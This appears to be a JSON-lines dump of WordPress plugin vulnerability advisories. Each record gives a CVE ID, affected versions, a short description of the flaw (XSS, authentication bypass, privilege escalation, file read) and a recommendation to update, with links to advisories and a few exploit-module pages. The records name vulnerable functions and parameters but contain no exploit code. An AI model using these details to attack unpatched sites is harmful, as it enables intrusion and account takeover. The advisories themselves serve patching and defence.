{"CVE_ID":"CVE-2025-3743","slug":"upsell-order-bump-offer-for-woocommerce","versionImpact":"3.0.0","versionEndExcluding":"3.0.1","description":"The Upsell Funnel Builder for WooCommerce plugin for WordPress is vulnerable to order manipulation in all versions up to, and including, 3.0.0. This is due to the plugin allowing the additional product ID and discount field to be manipulated prior to processing via the 'add_offer_in_cart' function. This makes it possible for unauthenticated attackers to arbitrarily update the product associated with any order bump, and arbitrarily update the discount applied to any order bump item, when adding it to the cart.","recommendation":"Update to version 3.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/upsell-order-bump-offer-for-woocommerce\\\/tags\\\/3.0.0\\\/public\\\/class-upsell-order-bump-offer-for-woocommerce-public.php#L1771\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/upsell-order-bump-offer-for-woocommerce\\\/tags\\\/3.0.0\\\/public\\\/class-upsell-order-bump-offer-for-woocommerce-public.php#L1771\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/upsell-order-bump-offer-for-woocommerce\\\/tags\\\/3.0.0\\\/public\\\/class-upsell-order-bump-offer-for-woocommerce-public.php#L1773\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/upsell-order-bump-offer-for-woocommerce\\\/tags\\\/3.0.0\\\/public\\\/class-upsell-order-bump-offer-for-woocommerce-public.php#L1773\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/upsell-order-bump-offer-for-woocommerce\\\/tags\\\/3.0.0\\\/public\\\/class-upsell-order-bump-offer-for-woocommerce-public.php#L1818\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/upsell-order-bump-offer-for-woocommerce\\\/tags\\\/3.0.0\\\/public\\\/class-upsell-order-bump-offer-for-woocommerce-public.php#L1818\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/upsell-order-bump-offer-for-woocommerce\\\/tags\\\/3.0.0\\\/public\\\/class-upsell-order-bump-offer-for-woocommerce-public.php#L1829\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/upsell-order-bump-offer-for-woocommerce\\\/tags\\\/3.0.0\\\/public\\\/class-upsell-order-bump-offer-for-woocommerce-public.php#L1829\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3279944\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3279944\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0e1546b-c8cc-4d57-9909-153209e3a9c6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0e1546b-c8cc-4d57-9909-153209e3a9c6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-34180","slug":"free-google-fonts","versionEndExcluding":"3.0.1","description":"Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in KAPlugins Google Fonts For WordPress plugin <=\u00a03.0.0 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/free-google-fonts\\\/wordpress-google-fonts-for-wordpress-plugin-3-0-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/free-google-fonts\\\/wordpress-google-fonts-for-wordpress-plugin-3-0-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10002","slug":"rover-idx","versionImpact":"3.0.0.2905","versionEndExcluding":"3.0.0.2906","description":"The Rover IDX plugin for WordPress is vulnerable to Authentication Bypass in versions up to, and including, 3.0.0.2905. This is due to insufficient validation and capability check on the 'rover_idx_refresh_social_callback' function. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to log in to administrator. The vulnerability is partially patched in version 3.0.0.2905 and fully patched in version 3.0.0.2906.","recommendation":"Update to version 3.0.0.2906, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5cf6a9fb-3c3b-48ad-a39b-77a529b89901?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5cf6a9fb-3c3b-48ad-a39b-77a529b89901?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rover-idx\\\/tags\\\/3.0.0.2903\\\/rover-social-common.php#L148\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rover-idx\\\/tags\\\/3.0.0.2903\\\/rover-social-common.php#L148\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rover-idx\\\/tags\\\/3.0.0.2903\\\/admin\\\/rover-panel-social.php#L153\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rover-idx\\\/tags\\\/3.0.0.2903\\\/admin\\\/rover-panel-social.php#L153\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173032\\\/rover-idx\\\/trunk\\\/rover-social-common.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173032\\\/rover-idx\\\/trunk\\\/rover-social-common.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10003","slug":"rover-idx","versionImpact":"3.0.0.2903","versionEndExcluding":"3.0.0.2905","description":"The Rover IDX plugin for WordPress is vulnerable to unauthorized access, modification, and loss of data due to a missing capability check on multiple functions in all versions up to, and including, 3.0.0.2903. This makes it possible for authenticated attackers, with subscriber-level access and above, to add, modify, or delete plugin options.","recommendation":"Update to version 3.0.0.2905, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cdf67099-5514-45ba-9a4c-10af984bf593?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cdf67099-5514-45ba-9a4c-10af984bf593?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rover-idx\\\/tags\\\/3.0.0.2903\\\/admin\\\/rover-panel-setup.php#L76\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rover-idx\\\/tags\\\/3.0.0.2903\\\/admin\\\/rover-panel-setup.php#L76\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rover-idx\\\/tags\\\/3.0.0.2903\\\/admin\\\/rover-panel-setup.php#L120\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rover-idx\\\/tags\\\/3.0.0.2903\\\/admin\\\/rover-panel-setup.php#L120\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rover-idx\\\/tags\\\/3.0.0.2903\\\/admin\\\/rover-panel-setup.php#L152\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rover-idx\\\/tags\\\/3.0.0.2903\\\/admin\\\/rover-panel-setup.php#L152\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rover-idx\\\/tags\\\/3.0.0.2903\\\/admin\\\/rover-panel-setup.php#L199\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rover-idx\\\/tags\\\/3.0.0.2903\\\/admin\\\/rover-panel-setup.php#L199\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rover-idx\\\/tags\\\/3.0.0.2903\\\/admin\\\/rover-panel-setup.php#L225\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rover-idx\\\/tags\\\/3.0.0.2903\\\/admin\\\/rover-panel-setup.php#L225\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rover-idx\\\/tags\\\/3.0.0.2903\\\/admin\\\/rover-panel-setup.php#L240\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rover-idx\\\/tags\\\/3.0.0.2903\\\/admin\\\/rover-panel-setup.php#L240\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rover-idx\\\/tags\\\/3.0.0.2903\\\/admin\\\/rover-panel-setup.php#L270\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rover-idx\\\/tags\\\/3.0.0.2903\\\/admin\\\/rover-panel-setup.php#L270\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3171681\\\/rover-idx\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3171681\\\/rover-idx\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0177","slug":"javo-core","versionImpact":"3.0.0.080","versionEndExcluding":"3.0.0.266","description":"The Javo Core plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 3.0.0.080. This is due to the plugin allowing users who are registering new accounts to set their own role. This makes it possible for unauthenticated attackers to gain elevated privileges by creating an account with the administrator role.","recommendation":"Update to version 3.0.0.266, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/javo-directory-wordpress-theme\\\/8390513#item-description__update-history\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/javo-directory-wordpress-theme\\\/8390513#item-description__update-history\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d636768-37b4-4343-9028-30e7b1f997f2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d636768-37b4-4343-9028-30e7b1f997f2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6444","slug":"seriously-simple-podcasting","versionImpact":"2.25.3","versionEndExcluding":"3.0.0","description":"The Seriously Simple Podcasting WordPress plugin before 3.0.0 discloses the Podcast owner's email address (which by default is the admin email address) via an unauthenticated crafted request.","recommendation":"Update to version 3.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/061c59d6-f4a0-4cd1-b945-5e92b9c2b4aa\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/061c59d6-f4a0-4cd1-b945-5e92b9c2b4aa\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10639","slug":"auto-prune-posts","versionImpact":"2.0.0","versionEndExcluding":"3.0.0","description":"The Auto Prune Posts WordPress plugin before 3.0.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/efab3a36-535b-40ff-b98f-482a0e5193f1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/efab3a36-535b-40ff-b98f-482a0e5193f1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6036","slug":"web3-authentication","versionImpact":"2.8.0","versionEndExcluding":"3.0.0","description":"The Web3 WordPress plugin before 3.0.0 is vulnerable to an authentication bypass due to incorrect authentication checking in the login flow in functions 'handle_auth_request' and 'hadle_login_request'. This makes it possible for non authenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username.","recommendation":"Update to version 3.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7f30ab20-805b-422c-a9a5-21d39c570ee4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7f30ab20-805b-422c-a9a5-21d39c570ee4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13501","slug":"formassembly-web-forms","versionImpact":"2.0.11","versionEndExcluding":"3.0.0","description":"The WP-FormAssembly plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'formassembly' shortcode in all versions up to, and including, 2.0.11 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/formassembly-web-forms\\\/tags\\\/2.0.11\\\/wp_formassembly.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/formassembly-web-forms\\\/tags\\\/2.0.11\\\/wp_formassembly.php#L32\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/formassembly-web-forms\\\/tags\\\/2.0.11\\\/wp_formassembly.php#L47\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/formassembly-web-forms\\\/tags\\\/2.0.11\\\/wp_formassembly.php#L47\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25ff6cc3-02ed-470a-aa10-4843e1ec01ce?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25ff6cc3-02ed-470a-aa10-4843e1ec01ce?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5658","slug":"wp-mapit","versionImpact":"2.7.1","versionEndExcluding":"3.0.0","description":"The WP MapIt plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wp_mapit' shortcode in all versions up to, and including, 2.7.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ef6f598-e1a7-4036-9485-1aad0416349a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ef6f598-e1a7-4036-9485-1aad0416349a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-mapit\\\/tags\\\/2.7.1\\\/wp_mapit\\\/classes\\\/class.wp_mapit_map.php#L235\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-mapit\\\/tags\\\/2.7.1\\\/wp_mapit\\\/classes\\\/class.wp_mapit_map.php#L235\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5076","slug":"ziteboard-online-whiteboard","versionImpact":"2.9.9","versionEndExcluding":"3.0.0","description":"The Ziteboard Online Whiteboard plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'ziteboard' shortcode in versions up to, and including, 2.9.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5608f50-e17a-471f-b644-dceb64d82f0c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5608f50-e17a-471f-b644-dceb64d82f0c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2988896\\\/ziteboard-online-whiteboard\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2988896\\\/ziteboard-online-whiteboard\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9836","slug":"rss-feed-widget","versionImpact":"2.9.9","versionEndExcluding":"3.0.0","description":"The RSS Feed Widget WordPress plugin before 3.0.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 3.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f87af54e-3e58-4c29-8a30-e7d52234c9d4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f87af54e-3e58-4c29-8a30-e7d52234c9d4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11918","slug":"image-alt-text","versionImpact":"2.0.0","versionEndExcluding":"3.0.0","description":"The Image Alt Text plugin for WordPress is vulnerable to unauthorized modification of data| due to a missing capability check on the iat_add_alt_txt_action and iat_update_alt_txt_action AJAX actions in all versions up to, and including, 2.0.0. This makes it possible for authenticated attackers, with subscriber-level access and above, to update the alt text on arbitrary images.","recommendation":"Update to version 3.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3188755%40image-alt-text&new=3188755%40image-alt-text&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3188755%40image-alt-text&new=3188755%40image-alt-text&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22143fe3-e599-4b44-99c0-ba66d88ff5d6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22143fe3-e599-4b44-99c0-ba66d88ff5d6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5954","slug":"aone-sms","versionImpact":"2.0.0","versionEndExcluding":"3.0.0","description":"The Service Finder SMS System plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 2.0.0. This is due to the plugin not restricting user role selection at the time of registration through the aonesms_fn_savedata_after_signup() function. This makes it possible for unauthenticated attackers to register as an administrator user.","recommendation":"Update to version 3.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/service-finder-service-and-business-listing-wordpress-theme\\\/15208793\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/service-finder-service-and-business-listing-wordpress-theme\\\/15208793\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/520c1e8b-d0c1-4201-90bf-0cefab9af7e0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/520c1e8b-d0c1-4201-90bf-0cefab9af7e0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11462","slug":"filestack-upload","versionImpact":"2.1.0","versionEndExcluding":"3.0.0","description":"The Filestack Official plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'fstab' and 'filestack_options' parameters in all versions up to, and including, 2.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/filestack-upload\\\/tags\\\/2.0.0\\\/lib\\\/admin-settings.php#L103\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/filestack-upload\\\/tags\\\/2.0.0\\\/lib\\\/admin-settings.php#L103\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/559a94d8-527d-48b3-a917-461ebfa012bc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/559a94d8-527d-48b3-a917-461ebfa012bc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13385","slug":"screenshot-machine-shortcode","versionImpact":"2.3.0","versionEndExcluding":"3.0.0","description":"The JSM Screenshot Machine Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ssm' shortcode in all versions up to, and including, 2.3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/jsmoriss\\\/screenshot-machine-shortcode\\\/blob\\\/main\\\/screenshot-machine-shortcode.php#L92-L119\",\"name\":\"https:\\\/\\\/github.com\\\/jsmoriss\\\/screenshot-machine-shortcode\\\/blob\\\/main\\\/screenshot-machine-shortcode.php#L92-L119\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3224419%40screenshot-machine-shortcode&new=3224419%40screenshot-machine-shortcode&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3224419%40screenshot-machine-shortcode&new=3224419%40screenshot-machine-shortcode&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/91019c36-bf33-4cd6-ac54-86c118d086fe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/91019c36-bf33-4cd6-ac54-86c118d086fe?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9109","slug":"flexible-shipping-ups","versionImpact":"2.3.11","versionEndExcluding":"3.0.0","description":"The WooCommerce UPS Shipping \u2013 Live Rates and Access Points plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the delete_oauth_data function in all versions up to, and including, 2.3.11. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete the plugin's API key.","recommendation":"Update to version 3.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/699fdea9-15ae-4882-9723-9a98d7d53c74?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/699fdea9-15ae-4882-9723-9a98d7d53c74?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flexible-shipping-ups\\\/trunk\\\/vendor_prefixed\\\/octolize\\\/wp-ups-oauth\\\/src\\\/OAuth\\\/Ajax.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flexible-shipping-ups\\\/trunk\\\/vendor_prefixed\\\/octolize\\\/wp-ups-oauth\\\/src\\\/OAuth\\\/Ajax.php#L32\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173845\\\/flexible-shipping-ups\\\/tags\\\/3.0.0\\\/vendor_prefixed\\\/octolize\\\/wp-ups-oauth\\\/src\\\/OAuth\\\/Ajax.php?old=3158553&old_path=flexible-shipping-ups%2Ftags%2F2.3.11%2Fvendor_prefixed%2Foctolize%2Fwp-ups-oauth%2Fsrc%2FOAuth%2FAjax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173845\\\/flexible-shipping-ups\\\/tags\\\/3.0.0\\\/vendor_prefixed\\\/octolize\\\/wp-ups-oauth\\\/src\\\/OAuth\\\/Ajax.php?old=3158553&old_path=flexible-shipping-ups%2Ftags%2F2.3.11%2Fvendor_prefixed%2Foctolize%2Fwp-ups-oauth%2Fsrc%2FOAuth%2FAjax.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-37259","slug":"wpextended","versionImpact":"2.4.7","versionEndExcluding":"3.0.0","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WP Extended The Ultimate WordPress Toolkit \u2013 WP Extended allows Reflected XSS.This issue affects The Ultimate WordPress Toolkit \u2013 WP Extended: from n\/a through 2.4.7.","recommendation":"Update to version 3.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wpextended\\\/wordpress-wp-extended-plugin-2-4-7-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wpextended\\\/wordpress-wp-extended-plugin-2-4-7-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5613","slug":"super-testimonial","versionImpact":"2.9","versionEndExcluding":"3.0","description":"The Super Testimonials plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'tpsscode' shortcode in all versions up to, and including, 2.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/super-testimonial\\\/tags\\\/2.8\\\/tp-testimonials.php#L214\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/super-testimonial\\\/tags\\\/2.8\\\/tp-testimonials.php#L214\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2979378\\\/super-testimonial#file9\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2979378\\\/super-testimonial#file9\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52659f1c-642e-4c88-b3d0-d5c5a206b11c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52659f1c-642e-4c88-b3d0-d5c5a206b11c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10136","slug":"gi-media-library","versionEndExcluding":"3.0","description":"The GI-Media Library plugin for WordPress is vulnerable to Directory Traversal in versions before 3.0 via the 'fileid' parameter. This allows unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.","refs":"[{\"url\":\"http:\\\/\\\/wordpressa.quantika14.com\\\/repository\\\/index.php?id=24\",\"name\":\"http:\\\/\\\/wordpressa.quantika14.com\\\/repository\\\/index.php?id=24\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/espreto\\\/wpsploit\\\/blob\\\/master\\\/modules\\\/auxiliary\\\/scanner\\\/http\\\/wp_gimedia_library_file_read.rb\",\"name\":\"https:\\\/\\\/github.com\\\/espreto\\\/wpsploit\\\/blob\\\/master\\\/modules\\\/auxiliary\\\/scanner\\\/http\\\/wp_gimedia_library_file_read.rb\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/1132677\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/1132677\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gi-media-library\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gi-media-library\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7754\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7754\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.rapid7.com\\\/db\\\/modules\\\/auxiliary\\\/scanner\\\/http\\\/wp_gimedia_library_file_read\\\/\",\"name\":\"https:\\\/\\\/www.rapid7.com\\\/db\\\/modules\\\/auxiliary\\\/scanner\\\/http\\\/wp_gimedia_library_file_read\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\